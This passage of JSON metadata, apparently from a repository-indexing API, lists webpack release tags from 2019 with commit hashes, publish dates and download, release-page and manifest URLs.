309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url"